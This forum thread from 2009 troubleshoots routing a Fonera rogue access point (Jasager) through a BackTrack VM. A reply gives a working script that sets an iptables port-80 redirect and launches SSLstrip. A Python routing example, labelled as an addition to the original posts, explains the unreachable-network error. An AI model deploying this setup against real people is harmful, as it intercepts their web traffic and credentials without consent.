rosbif Posted December 23, 2009

Hi there,

I've spent the best part of the day searching through the site and googling for help, before deciding to bother you all with this. Excuse the newbie questions.

I'm running backtrack in a vmware and want to set up the fonera to run through this. I got it set up through windows with ICS fine, but am having issues with the backtrack set up. Primarily because of the networking side of things through the VMWare.

The route I'm expecting is Fonera -> VMWare Backtrack -> Windows box -> Internet (I think this is right)

Here are some bits of network info.

1. Home network 192.168.0.0/24
2. Backtrack network through VMWare 192.168.124.0/24
3. Fonera IP address : 192.168.1.1
4. Internet gateway : 192.168.0.100
5. VMWare eth0 : 192.168.124.128
6. VMWare adapter (Windows host side) : 192.168.124.10
7. IP address of Windows box 192.168.0.102

VMware ifconfig:

    eth0      Link encap:Ethernet  HWaddr 00:0c:29:f7:56:e2
              inet addr:192.168.124.128  Bcast:192.168.124.255  Mask:255.255.255.0
              inet6 addr: fe80::20c:29ff:fef7:56e2/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:39225 errors:0 dropped:0 overruns:0 frame:0
              TX packets:34972 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:24833456 (24.8 MB)  TX bytes:3821384 (3.8 MB)
              Interrupt:18 Base address:0x1080

    lo        Link encap:Local Loopback
              inet addr:127.0.0.1  Mask:255.0.0.0
              inet6 addr: ::1/128 Scope:Host
              UP LOOPBACK RUNNING  MTU:16436  Metric:1
              RX packets:392 errors:0 dropped:0 overruns:0 frame:0
              TX packets:392 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:19600 (19.6 KB)  TX bytes:19600 (19.6 KB)

Fonera ifconfig:

    ath0      Link encap:Ethernet  HWaddr 00:18:84:A5:85:F9
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:0 errors:0 dropped:0 overruns:0 frame:0
              TX packets:748 errors:0 dropped:44 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:0 (0.0 B)  TX bytes:295263 (288.3 KiB)

    br-lan    Link encap:Ethernet  HWaddr 00:18:84:A5:85:F8
              inet addr:192.168.1.1  Bcast:192.168.1.255  Mask:255.255.255.0
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:2720 errors:0 dropped:0 overruns:0 frame:0
              TX packets:2673 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:258665 (252.6 KiB)  TX bytes:267270 (261.0 KiB)

    eth0      Link encap:Ethernet  HWaddr 00:18:84:A5:85:F8
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:2720 errors:0 dropped:0 overruns:0 frame:0
              TX packets:3402 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:302185 (295.1 KiB)  TX bytes:569405 (556.0 KiB)
              Interrupt:255 Base address:0x1000

    eth0.0    Link encap:Ethernet  HWaddr 00:18:84:A5:85:F8
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:2720 errors:0 dropped:0 overruns:0 frame:0
              TX packets:2673 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:258665 (252.6 KiB)  TX bytes:267270 (261.0 KiB)

    eth0.1    Link encap:Ethernet  HWaddr 00:18:84:A5:85:F8
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:0 errors:0 dropped:0 overruns:0 frame:0
              TX packets:728 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:0 (0.0 B)  TX bytes:292656 (285.7 KiB)

    lo        Link encap:Local Loopback
              inet addr:127.0.0.1  Mask:255.0.0.0
              UP LOOPBACK RUNNING  MTU:16436  Metric:1
              RX packets:12 errors:0 dropped:0 overruns:0 frame:0
              TX packets:12 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:720 (720.0 B)  TX bytes:720 (720.0 B)

    wifi0     Link encap:UNSPEC  HWaddr 00-18-84-A5-85-F9-00-00-00-00-00-00-00-00-00-00
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:22471 errors:0 dropped:0 overruns:0 frame:689
              TX packets:2836 errors:485 dropped:0 overruns:0 carrier:0

    root@RogueAP:~# brctl show
    bridge name     bridge id               STP enabled     interfaces
    br-lan          8000.001884a585f8       no              ath0
                                                            eth0.0

fonera /etc/config/network:

    config 'interface' 'loopback'
        option 'ifname' 'lo'
        option 'proto' 'static'
        option 'ipaddr' '127.0.0.1'
        option 'netmask' '255.0.0.0'

    config 'interface' 'lan'
        option 'type' 'bridge'
        option 'ipaddr' '192.168.1.1'
        option 'netmask' '255.255.255.0'
        option 'ifname' 'eth0.0'
        option 'dns' '8.8.8.8 8.8.4.4'
        option 'proto' 'static'
        option 'macaddr' ''
        option 'ip6addr' ''
        option 'ip6gw' ''
        option 'gateway' ''

    config 'interface' 'wan'
        option 'ifname' 'eth0.1'
        option 'macaddr' ''
        option 'ip6addr' ''
        option 'netmask' ''
        option 'gateway' '192.168.0.100'
        option 'ip6gw' ''
        option 'dns' ''
        option 'proto' 'dhcp'
        option 'ipaddr' ''

    config 'interface' 'wifi'
        option 'ifname' 'ath0'
        option 'proto' 'dhcp'
        option 'macaddr' ''
        option 'ipaddr' ''
        option 'ip6addr' ''
        option 'netmask' ''
        option 'gateway' ''
        option 'ip6gw' ''
        option 'dns' ''

fonera /etc/config/dhcp

    config 'dnsmasq'
        option 'domainneeded' '1'
        option 'boguspriv' '1'
        option 'filterwin2k' '0'
        option 'localise_queries' '1'
        option 'local' '/lan/'
        option 'domain' 'lan'
        option 'expandhosts' '1'
        option 'nonegcache' '0'
        option 'authoritative' '1'
        option 'readethers' '1'
        option 'leasefile' '/tmp/dhcp.leases'
        option 'resolvfile' '/tmp/resolv.conf.auto'

    config 'dhcp' 'lan'
        option 'interface' 'lan'
        option 'start' '100'
        option 'limit' '150'
        option 'leasetime' '12h'
        list 'dhcp_option' '3,192.168.0.100'

    config 'dhcp' 'wan'
        option 'interface' 'wan'
        option 'ignore' '1'

    config 'host'
        option 'name' 'BackTrackBox'
        option 'ip' '192.168.0.102'

    config 'dhcp' 'cfg0875fa'
        option 'start' '2'
        option 'limit' '250'
        option 'leasetime' '60m'
        option 'ignore' '0'
        option 'interface' 'wifi'

Now I can access the internet through the VMWare, no problems, but through the fonera I can't even ping IP addresses.

    root@RogueAP:/etc/config# ping 192.168.0.100
    PING 192.168.0.100 (192.168.0.100): 56 data bytes
    ping: sendto: Network is unreachable
    root@RogueAP:/etc/config# ping 192.168.124.128
    PING 192.168.124.128 (192.168.124.128): 56 data bytes
    ping: sendto: Network is unreachable

I'm sure I've screwed something up. Can anyone give me any clues/help please?

TIA,
Neil
Netshroud Posted December 23, 2009

Firstly, you don't need ICS enabled on the Windows box. You also have what appears to be a complete salad of IP addresses.

Your home network is 192.168.0.0/24, so your Windows box and the Backtrack VM need one adapter on that network. The Fon is at 192.168.1.1, I believe by default it's a /16. I would recommend changing the Fon to a completely different subnet, so you can tell what IP is on what network at a glance. I like the 172.[16-32].[0-254].0/24 or /16 network, as the private 172.[16-32] range is almost never used.

Then you need to bridge your vmnets to individual adapters. I have vmnet0 bridged to my home network and vmnet1 bridged to my LAN (I'm doing the same as you, but with Ubuntu 9.10). You can change it with vmnetcfg.exe, for me it was located in C:\Program Files (x86)\VMware\VMware Workstation\. So on your VM, you should have 2 virtual NICs. Bridge one (say eth0) to your home network, and bridge the other (say eth1) to the Fon network.

Then you need to configure the Fon, as well as dnsmasq on the Fon, for the gateway IP to be that of the VM, and to set up DNS.

Following that, enable IP forwarding on the VM. This is simply changing /proc/sys/net/ipv4/ip_forward to be a 1 instead of a 0, then running iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE.

I use this little script to set up 'ICS', set up my IPs, configure iptables for SSLstrip, and launch SSLstrip:

    echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null
    sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123
    sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    sudo ifconfig eth1 172.20.182.1 netmask 255.255.255.0
    sudo dhclient eth0
    python sslstrip.py -l 64123 -f lock.ico

(eth1 is Fon network, eth0 is home network.)

If it doesn't exist, create ath0 using the Jasager interface, make sure it's bridged to your LAN port (brctl show, and if it isn't, brctl addif br-lan ath0). Make sure your box is plugged into the LAN port of the Fon+ and you're done.
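Why the Fon in the first post answers "Network is unreachable", and why pointing its gateway at the VM changes that, modelled as an added example that is not part of the original posts. The Fon address 172.20.182.2 and the function names are assumptions; the other addresses are taken from the thread.

```python
import ipaddress

def connected_routes(interfaces):
    """Connected subnets derived from the addresses on each interface."""
    return {name: ipaddress.ip_interface(cidr).network
            for name, cidr in interfaces.items()}

def usable_gateway(gateway, interfaces):
    """Return the interface a gateway is reachable through, or None.
    A next hop is only usable if it lies inside a connected subnet."""
    if not gateway:
        return None
    gw = ipaddress.ip_address(gateway)
    for name, net in connected_routes(interfaces).items():
        if gw in net:
            return name
    return None

def lookup(dest, interfaces, gateway=None):
    """Minimal route lookup: connected subnet first, then the default route.
    None models ping's 'Network is unreachable'."""
    d = ipaddress.ip_address(dest)
    for name, net in connected_routes(interfaces).items():
        if d in net:
            return ("direct", name)
    via = usable_gateway(gateway, interfaces)
    return ("via " + gateway, via) if via else None

# From the first post: br-lan is the only Fon interface with an address.
FON_AS_POSTED = {"br-lan": "192.168.1.1/24"}
GATEWAY_AS_POSTED = "192.168.0.100"  # wan 'gateway' and dhcp_option 3

# From the reply: the VM's eth1 is 172.20.182.1/24. The Fon's own address
# 172.20.182.2 is an assumption made for this example.
FON_FIXED = {"br-lan": "172.20.182.2/24"}
GATEWAY_FIXED = "172.20.182.1"

def report(interfaces, gateway, targets):
    """Route decision for each target address."""
    return {t: lookup(t, interfaces, gateway) for t in targets}

if __name__ == "__main__":
    targets = ["192.168.0.100", "192.168.124.128"]
    print("as posted:", report(FON_AS_POSTED, GATEWAY_AS_POSTED, targets))
    print("fixed:    ", report(FON_FIXED, GATEWAY_FIXED, targets))
```

In the corrected layout the Fon only has a route as far as the VM; traffic goes further only once IP forwarding and the MASQUERADE rule from the reply are in place on the VM.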
rosbif (Author) Posted December 24, 2009

> Firstly, you don't need ICS enabled on the Windows box.

Y'know, I try to be clear in my posts so I can get my message across and I still screw it up. I meant to say that I'd tested my setup using Windows ICS, just to see if I could get it all working. Now my aim is to do the same in the VMWare session.

> You also have what appears to be a complete salad of IP addresses.

I know. Having the VMWare session just threw me completely.

> Your home network is 192.168.0.0/24, so your Windows box and the Backtrack VM need one adapter on that network. The Fon is at 192.168.1.1, I believe by default it's a /16. I would recommend changing the Fon to a completely different subnet, so you can tell what IP is on what network at a glance. I like the 172.[16-32].[0-254].0/24 or /16 network, as the private 172.[16-32] range is almost never used.
>
> Then you need to bridge your vmnets to individual adapters. I have vmnet0 bridged to my home network and vmnet1 bridged to my LAN (I'm doing the same as you, but with Ubuntu 9.10). You can change it with vmnetcfg.exe, for me it was located in C:\Program Files (x86)\VMware\VMware Workstation\. So on your VM, you should have 2 virtual NICs. Bridge one (say eth0) to your home network, and bridge the other (say eth1) to the Fon network.
>
> Then you need to configure the Fon, as well as dnsmasq on the Fon, for the gateway IP to be that of the VM, and to set up DNS.
>
> Following that, enable IP forwarding on the VM. This is simply changing /proc/sys/net/ipv4/ip_forward to be a 1 instead of a 0, then running iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE.
>
> I use this little script to set up 'ICS', set up my IPs, configure iptables for SSLstrip, and launch SSLstrip:
>
>     echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null
>     sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123
>     sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
>     sudo ifconfig eth1 172.20.182.1 netmask 255.255.255.0
>     sudo dhclient eth0
>     python sslstrip.py -l 64123 -f lock.ico
>
> (eth1 is Fon network, eth0 is home network.)
>
> If it doesn't exist, create ath0 using the Jasager interface, make sure it's bridged to your LAN port (brctl show, and if it isn't, brctl addif br-lan ath0). Make sure your box is plugged into the LAN port of the Fon+ and you're done.

Lovely stuff, thanks very much for your input on this. I'll report back later on.

Neil
rosbif (Author) Posted December 26, 2009

> Lovely stuff, thanks very much for your input on this. I'll report back later on.
>
> Neil

Dunno if it's bad form to reply to your own posts, but I played around with the settings as described above, and aside from a bit of VMWare network tweaking, it worked fine.

Thanks very much for your help.

N